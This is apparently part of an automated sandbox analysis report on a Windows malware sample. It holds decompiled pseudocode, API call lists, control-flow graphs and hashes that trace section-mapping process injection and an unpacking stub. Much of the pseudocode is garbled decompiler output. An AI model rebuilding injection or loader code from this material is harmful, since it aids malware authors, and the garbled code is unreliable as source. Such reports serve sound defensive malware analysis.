											_t190 = _t190 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t155;
												__eflags =  *((intOrPtr*)(0 +  *(_t194 - 0x48) + _t173));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t180);
										_t171 = 0;
										__eflags = 0;
										_t108 = _t194 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t194 - 0xc), 0, 0, 0, 0, 0, _t180[0xa] +  *(_t194 - 0x40),  *(_t194 - 0x3c), _t108, 0);
									} else {
										L51();
										_pop(_t174);
										_t171 = _t174 - 0x1781;
										 *((intOrPtr*)(_t171 + 0x17b5)) = _t171 + 0x2c1d;
										E00401256(_t127, _t171 + 0x17b5, _t171, _t180, _t220, _t171 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t171 + 0x17da)) = _t171 + 0x2c6d;
										_t155 =  *(_t194 - 0xc);
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t91 =  *_t196;
				_t197 =  &(_t196[1]);
				_push(0x37e);
				_t130 =  *_t197;
				return E004011BB(_t91, _t130, _t155, _t171, _t180, _t220, _t221);
			}










































                                                              0x00401501
                                                              0x00401501
                                                              0x00401501
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: ebf5b87ca574a2093f45f0c1329a303c09540bf947450197218f7952483030ba
                                                              • Instruction ID: bd371bee40ec3abd78cd11d740c8041ac39bc23a5b358860ff84b61223384543
                                                              • Opcode Fuzzy Hash: ebf5b87ca574a2093f45f0c1329a303c09540bf947450197218f7952483030ba
                                                              • Instruction Fuzzy Hash: EF5109B5900259BFEF209F91CC48FDFBBB8FF85B10F144159F911AA2A5D6709A41CB24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0207003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 207003c-2070047 1 207004c-2070263 call 2070a3f call 2070e0f call 2070d90 VirtualAlloc 0->1 2 2070049 0->2 18 2070265-2070289 call 2070a69 1->18 19 207028b-2070292 1->19 5 207004a 2->5 5->5 23 20702ce-20703c2 VirtualProtect call 2070cce call 2070ce7 18->23 21 20702a1-20702b0 19->21 22 20702b2-20702cc 21->22 21->23 22->21 30 20703d1-20703e0 23->30 31 20703e2-2070437 call 2070ce7 30->31 32 2070439-20704b8 VirtualFree 30->32 31->30 34 20705f4-20705fe 32->34 35 20704be-20704cd 32->35 36 2070604-207060d 34->36 37 207077f-2070789 34->37 39 20704d3-20704dd 35->39 36->37 42 2070613-2070637 36->42 40 20707a6-20707b0 37->40 41 207078b-20707a3 37->41 39->34 44 20704e3-2070505 39->44 45 20707b6-20707cb 40->45 46 207086e-20708be LoadLibraryA 40->46 41->40 47 207063e-2070648 42->47 52 2070517-2070520 44->52 53 2070507-2070515 44->53 49 20707d2-20707d5 45->49 51 20708c7-20708f9 46->51 47->37 50 207064e-207065a 47->50 54 20707d7-20707e0 49->54 55 2070824-2070833 49->55 50->37 56 2070660-207066a 50->56 57 2070902-207091d 51->57 58 20708fb-2070901 51->58 59 2070526-2070547 52->59 53->59 60 20707e4-2070822 54->60 61 20707e2 54->61 63 2070839-207083c 55->63 62 207067a-2070689 56->62 58->57 64 207054d-2070550 59->64 60->49 61->55 65 2070750-207077a 62->65 66 207068f-20706b2 62->66 63->46 67 207083e-2070847 63->67 69 2070556-207056b 64->69 70 20705e0-20705ef 64->70 65->47 71 20706b4-20706ed 66->71 72 20706ef-20706fc 66->72 73 207084b-207086c 67->73 74 2070849 67->74 75 207056f-207057a 69->75 76 207056d 69->76 70->39 71->72 77 20706fe-2070748 72->77 78 207074b 72->78 73->63 74->46 79 207057c-2070599 75->79 80 207059b-20705bb 75->80 76->70 77->78 78->62 85 20705bd-20705db 79->85 80->85 85->64
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0207024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2070000_file.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 50efd5ea452f4a254e78f57e487951b55c6c7cb92d3f8d917f5750a4a807583a
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: D5525875E012299FDBA4CF58C984BACBBB1BF09304F1481D9E94DAB251DB30AA85DF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040A22A Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 319 40a22a-40a243 321 40a245-40a248 319->321 322 40a25d-40a261 319->322 323 40a2ed-40a2ef 321->323 324 40a263-40a278 call 40b014 322->324 325 40a24d-40a24f 322->325 324->321 332 40a27a-40a281 324->332 326 40a251 325->326 327 40a252-40a259 call 40b5e0 325->327 326->327 327->322 333 40a2c5-40a2c8 332->333 334 40a283-40a290 call 40b5e0 333->334 335 40a2ca-40a2e9 333->335 339 40a292-40a295 call 40b014 334->339 340 40a2c3 334->340 341 40a2eb-40a2ec 335->341 343 40a29a-40a2a0 339->343 340->333 341->323 344 40a2f0-40a305 343->344 345 40a2a2-40a2af call 40b4db 343->345 344->341 349 40a2c0 345->349 350 40a2b1-40a2bd 345->350 349->340 350->349
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339611834.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID:
                                                              • API String ID: 3494438863-0
                                                              • Opcode ID: 53f0db518e11e19cf3d20b75c8e5157a4bfced06fe33a4e46221324b2e3a85d0
                                                              • Instruction ID: 7ff23b28151b566c8cbfd56bb0cd94605b4a1bb2763dc4f056cfeb7ae197ddbf
                                                              • Opcode Fuzzy Hash: 53f0db518e11e19cf3d20b75c8e5157a4bfced06fe33a4e46221324b2e3a85d0
                                                              • Instruction Fuzzy Hash: C521F6B28083406AD7216B317C05B6737C8EB81379F2505BFE851763D2EB7E9891865E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02070E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 352 2070e0f-2070e24 SetErrorMode * 2 353 2070e26 352->353 354 2070e2b-2070e2c 352->354 353->354
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02070223,?,?), ref: 02070E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02070223,?,?), ref: 02070E1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2070000_file.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: 455c2124494d89fefc595ca8015f7c2e2e7cbe2ef3c0df78bb7229cd438db30c
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: C2D0123154522877D7412A94DC09BCD7B5CDF09B66F008011FB0DD9080C770954046E9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040189D Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 355 40189d-4018e0 call 4011bb Sleep call 4013f5 365 4018e2-4018ea call 4014cf 355->365 366 4018ef-40192c call 4011bb 355->366 365->366
                                                              C-Code - Quality: 66%
                                                              			E0040189D(signed int __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t11;
				intOrPtr* _t14;
				void* _t15;
				void* _t20;
				signed char _t21;

				_t18 = __edi;
				_t17 = __edx ^  *[gs:0x18c3b8];
				_t21 = __edx ^  *[gs:0x18c3b8];
				__eax = __eax | 0xf3f98595;
				__eflags = 0x18c3;
				_t15 = 0x65;
				E004011BB(0x18c3, _t15, _t17, __edi, __esi, _t21, __fp0);
				_t14 =  *((intOrPtr*)(_t20 + 8));
				Sleep(0x1388);
				_t11 = E004013F5(_t17, _t18, __esi, _t21, _t14,  *((intOrPtr*)(_t20 + 0xc)),  *((intOrPtr*)(_t20 + 0x10)), _t20 - 4); // executed
				_t22 = _t11;
				if(_t11 != 0) {
					E004014CF(_t17, _t22, __fp0, _t14, _t11,  *((intOrPtr*)(_t20 - 4)),  *((intOrPtr*)(_t20 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				_push(0x18c3);
			}








                                                              0x0040189d
                                                              0x0040189d
                                                              0x0040189d
                                                              0x004018ad
                                                              0x004018ad
                                                              0x004018b6
                                                              0x004018be
                                                              0x004018c3
                                                              0x004018cb
                                                              0x004018d9
                                                              0x004018de
                                                              0x004018e0
                                                              0x004018ea
                                                              0x004018ea
                                                              0x004018f3
                                                              0x004018fc

                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 004018CB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 8b77036b1a27a9c7dfc0189ead4c1f30c43aa5a46c5e9ddab95927bc0a212abd
                                                              • Instruction ID: a02e35ba6da00efe994e29ce0eaeefbb09db0d2e4018ecf4a20588ff4ad8f681
                                                              • Opcode Fuzzy Hash: 8b77036b1a27a9c7dfc0189ead4c1f30c43aa5a46c5e9ddab95927bc0a212abd
                                                              • Instruction Fuzzy Hash: 6201B977608105EBEB016A948C41EB93765AF44711F24C537BA03781F1D67D8713A76F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401890 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 377 401890-4018e0 call 4011bb Sleep call 4013f5 389 4018e2-4018ea call 4014cf 377->389 390 4018ef-40192c call 4011bb 377->390 389->390
                                                              C-Code - Quality: 57%
                                                              			E00401890(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t11;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				void* _t20;

				_t18 = __edi;
				_push(__edi);
				__eax = __eax | 0xf3f98595;
				__eflags = 0x18c3;
				_t16 = 0x65;
				E004011BB(0x18c3, _t16, _t17, __edi, __esi, _t20, __fp0);
				_t15 = _a4;
				Sleep(0x1388);
				_t11 = E004013F5(_t17, _t18, __esi, _t20, _t15, _a8, _a12,  &_v8); // executed
				_t21 = _t11;
				if(_t11 != 0) {
					E004014CF(_t17, _t21, __fp0, _t15, _t11, _v8, _a16); // executed
				}
				 *_t15(0xffffffff, 0);
				_push(0x18c3);
			}









                                                              0x00401890
                                                              0x00401898
                                                              0x004018ad
                                                              0x004018ad
                                                              0x004018b6
                                                              0x004018be
                                                              0x004018c3
                                                              0x004018cb
                                                              0x004018d9
                                                              0x004018de
                                                              0x004018e0
                                                              0x004018ea
                                                              0x004018ea
                                                              0x004018f3
                                                              0x004018fc

                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 004018CB
                                                                • Part of subcall function 004014CF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                • Part of subcall function 004014CF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                • Part of subcall function 004014CF: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 04d77c005a321a04c0d65ccc9281052a4a3ded78dde72ec47b1ef39188f4cdac
                                                              • Instruction ID: 8f39270ed9ea08bd5d3f38822785b1c482e0596b14cfc6610146d31112912ead
                                                              • Opcode Fuzzy Hash: 04d77c005a321a04c0d65ccc9281052a4a3ded78dde72ec47b1ef39188f4cdac
                                                              • Instruction Fuzzy Hash: 1001D876608104EBE7007A948C81EAA3369AF04710F208537BA03781F1C53D9713A76F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004018BA Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 401 4018ba-4018e0 call 4011bb Sleep call 4013f5 409 4018e2-4018ea call 4014cf 401->409 410 4018ef-40192c call 4011bb 401->410 409->410
                                                              C-Code - Quality: 64%
                                                              			E004018BA(void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t14;
				void* _t15;
				void* _t16;
				void* _t19;

				_t20 = __eflags;
				_t17 = __edi;
				_t15 = 0x65;
				E004011BB(_t8, _t15, _t16, __edi, __esi, __eflags, __fp0);
				_t14 =  *((intOrPtr*)(_t19 + 8));
				Sleep(0x1388);
				_t11 = E004013F5(_t16, _t17, __esi, _t20, _t14,  *((intOrPtr*)(_t19 + 0xc)),  *((intOrPtr*)(_t19 + 0x10)), _t19 - 4); // executed
				_t21 = _t11;
				if(_t11 != 0) {
					E004014CF(_t16, _t21, __fp0, _t14, _t11,  *((intOrPtr*)(_t19 - 4)),  *((intOrPtr*)(_t19 + 0x14))); // executed
				}
				 *_t14(0xffffffff, 0);
				_push(0x18c3);
			}









                                                              0x004018ba
                                                              0x004018ba
                                                              0x004018b6
                                                              0x004018be
                                                              0x004018c3
                                                              0x004018cb
                                                              0x004018d9
                                                              0x004018de
                                                              0x004018e0
                                                              0x004018ea
                                                              0x004018ea
                                                              0x004018f3
                                                              0x004018fc

                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 004018CB
                                                                • Part of subcall function 004014CF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                • Part of subcall function 004014CF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                • Part of subcall function 004014CF: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 2150068fafe268fe9e7df539654189d3fc6e8b654a1e8f04fb5b48b64cd69d78
                                                              • Instruction ID: b534f1cd2e4676c17bf77ce83b64d7a83011e734f56cb89338415bb8e59cf26b
                                                              • Opcode Fuzzy Hash: 2150068fafe268fe9e7df539654189d3fc6e8b654a1e8f04fb5b48b64cd69d78
                                                              • Instruction Fuzzy Hash: EDF06876208105EBDB016F949C82EAE3365AF48711F248537FB03791F1C67D9623A76B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 0207092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2070000_file.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$GetProcAddress.$l
                                                              • API String ID: 0-2784972518
                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction ID: 222ddb5058cdaa74dd46892d462cb25282b0ac1eeaab041149d7128d3079800e
                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction Fuzzy Hash: F93148B6910709DFDB11CF99C880AEEBBFAFF48324F15414AD841A7210D771EA45CBA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402F9D Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 69%
                                                              			E00402F9D(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t30;
				signed int _t37;
				void* _t38;
				void* _t42;
				void* _t44;

				asm("fidiv dword [edi]");
				 *__eax =  *__eax + __eax;
				_t30 = __eax + __eax;
				if(_t42 != 1) {
					if (__eflags == 0) goto L12;
					while(1) {
						asm("ror byte [ebp+0x65], 0x74");
						__ebp = __ebp - 1;
						__eflags = __ebp;
						if(__ebp == 0) {
							 *__edx =  *__edx - __eax;
							__eflags =  *__edx;
							_push(__eax);
							if( *__edx != 0) {
								L43:
								asm("out dx, eax");
							}
							__al = __al +  *((intOrPtr*)(__eax - 0x7ffdd5f5));
							asm("adc al, 0x2a");
							__al = __al +  *__eax;
							asm("adc [edx], ch");
							__eflags = __dl;
							L42:
							 *__eax =  *__eax + __al;
							__ah = __ah + __ah;
							asm("a16 mov ebx, 0xbb9df35c");
							 *0x10b3624e = __eax;
							asm("in eax, 0x5f");
							goto ( *((intOrPtr*)(__esp + __eax - 0x108246a3)));
							goto L43;
						}
						__edi = __edi + 1;
						__eflags = __edi;
						if(__eflags == 0) {
							L10:
							 *__eax =  *__eax + __al;
							_pop(__ecx);
							__ebx = __ebx + __edx;
							__eflags = __ebx;
							__edx = __eax * __ecx >> 0x20;
							__eax = __eax * __ecx;
							__eax = __eax + 0xfb729e8c;
							__eflags = __eax;
							__eax = __eax + __ebx;
							__eflags = __eax;
							if(__eflags != 0 && __eflags == 0) {
								_t6 = __eax;
								__eax = __edi;
								__edi = _t6;
								asm("sbb [eax-0x77], dh");
							}
							 *(__esp - 4) = __eax;
							__esp = __esp - 4;
							return __eax;
						}
						 *((char*)(__ecx + 0x74)) =  *((char*)(__ecx + 0x74)) - 0xc0;
						_t10 = __eax *  *(__edx + 0x74);
						__edx = __eax *  *(__edx + 0x74) >> 0x20;
						__eax = _t10;
						__eflags = __eax;
						asm("loopne 0x43");
						if(__eflags == 0) {
							L32:
							asm("invalid");
							if(__eflags <= 0) {
								L35:
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __ah;
								asm("int1");
								asm("out 0x75, al");
								asm("adc al, dh");
								asm("out 0x75, al");
								 *__eax =  *__eax + __al;
								 *__eax =  *__eax + __al;
								asm("loopne 0xffffffa5");
								__ah = 0x74;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
								 *__eax =  *__eax + __al;
								 *((intOrPtr*)(__eax - 0x69)) =  *((intOrPtr*)(__eax - 0x69)) + 0x74;
								 *__edx =  *__edx - __eax;
								__eflags =  *__edx;
								__al =  *0x80022999;
								L37:
								asm("cdq");
								 *__edx =  *__edx - __eax;
								asm("adc byte [edi-0x699ffdd7], 0x29");
								__al = __al + __al;
								 *__edx =  *__edx - __eax;
								asm("pushad");
								 *__edx =  *__edx - __eax;
								__eflags =  *__edx;
								if ( *__edx < 0) goto L23;
								L38:
								_t20 = __eax;
								__eax = __esi;
								__esi = _t20;
							}
							asm("in eax, dx");
							asm("rcr byte [ebx-0x3f4f894a], 0xb5");
							if(__eflags <= 0) {
								goto L37;
							}
							asm("enter 0x76b6, 0x0");
							goto L35;
						}
						_pop(__ecx);
						if(__eflags == 0) {
							goto L38;
						}
						_pop(__eax);
						if(__eflags == 0) {
							goto L42;
						}
						_pop(__eax);
						if (__eflags == 0) goto L31;
						 *__eax =  *__eax + __al;
						_t16 = __eax + 0x1076b6c7;
						 *_t16 =  *(__eax + 0x1076b6c7) + __dl;
						__eflags =  *_t16;
						goto L32;
					}
					L12:
					asm("hlt");
					_push(0x2e46);
					goto L10;
				}
				_t37 =  *(_t30 + 2) & 0x000000ff;
				_t38 = _t37 + 1;
				_push(_t38);
				_t44 = _t44 + 4;
				asm("adc [esi-0x34], bh");
				goto L12;
			}








                                                              0x00402f9d
                                                              0x00402fa0
                                                              0x00402fa2
                                                              0x00402fa5
                                                              0x00402fa8
                                                              0x00402fab
                                                              0x00402fab
                                                              0x00402fac
                                                              0x00402fac
                                                              0x00402fad
                                                              0x00403021
                                                              0x00403021
                                                              0x00403023
                                                              0x00403024
                                                              0x0040304f
                                                              0x0040304f
                                                              0x0040304f
                                                              0x00403026
                                                              0x0040302c
                                                              0x0040302e
                                                              0x00403030
                                                              0x00403032
                                                              0x00403038
                                                              0x00403038
                                                              0x0040303a
                                                              0x0040303c
                                                              0x00403042
                                                              0x00403047
                                                              0x00403049
                                                              0x00000000
                                                              0x00403049
                                                              0x00402fb0
                                                              0x00402fb0
                                                              0x00402fb1
                                                              0x00402f64
                                                              0x00402f64
                                                              0x00402f66
                                                              0x00402f6f
                                                              0x00402f6f
                                                              0x00402f71
                                                              0x00402f71
                                                              0x00402f74
                                                              0x00402f74
                                                              0x00402f7a
                                                              0x00402f7a
                                                              0x00402f7c
                                                              0x00402f80
                                                              0x00402f80
                                                              0x00402f80
                                                              0x00402f81
                                                              0x00402f81
                                                              0x00402f83
                                                              0x00402f87
                                                              0x00000000
                                                              0x00402f87
                                                              0x00402fb4
                                                              0x00402fb8
                                                              0x00402fb8
                                                              0x00402fb8
                                                              0x00402fb8
                                                              0x00402fbb
                                                              0x00402fbd
                                                              0x00402fd0
                                                              0x00402fd0
                                                              0x00402fd2
                                                              0x00402fe4
                                                              0x00402fe4
                                                              0x00402fe6
                                                              0x00402fe8
                                                              0x00402fe9
                                                              0x00402feb
                                                              0x00402fed
                                                              0x00402fef
                                                              0x00402ff1
                                                              0x00402ff3
                                                              0x00402ff5
                                                              0x00402ff7
                                                              0x00402ff7
                                                              0x00402ff8
                                                              0x00402ffa
                                                              0x00402ffd
                                                              0x00402ffd
                                                              0x00402fff
                                                              0x00403000
                                                              0x00403000
                                                              0x00403001
                                                              0x00403003
                                                              0x0040300a
                                                              0x0040300d
                                                              0x0040300f
                                                              0x00403011
                                                              0x00403011
                                                              0x00403013
                                                              0x00403014
                                                              0x00403014
                                                              0x00403014
                                                              0x00403014
                                                              0x00403014
                                                              0x00402fd4
                                                              0x00402fd7
                                                              0x00402fde
                                                              0x00000000
                                                              0x00000000
                                                              0x00402fe0
                                                              0x00000000
                                                              0x00402fe0
                                                              0x00402fc0
                                                              0x00402fc1
                                                              0x00000000
                                                              0x00000000
                                                              0x00402fc4
                                                              0x00402fc5
                                                              0x00000000
                                                              0x00000000
                                                              0x00402fc8
                                                              0x00402fc9
                                                              0x00402fcc
                                                              0x00402fce
                                                              0x00402fce
                                                              0x00402fce
                                                              0x00000000
                                                              0x00402fce
                                                              0x00402f6c
                                                              0x00402f6c
                                                              0x00402f61
                                                              0x00000000
                                                              0x00402f61
                                                              0x00402f38
                                                              0x00402f43
                                                              0x00402f4b
                                                              0x00402f4f
                                                              0x00402f5a
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.339575302.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: t
                                                              • API String ID: 0-2238339752
                                                              • Opcode ID: a79a3976ad42dffdb4b9f23f0dcdb041505745a5c7377fe6c1fdeee55a6d18bf
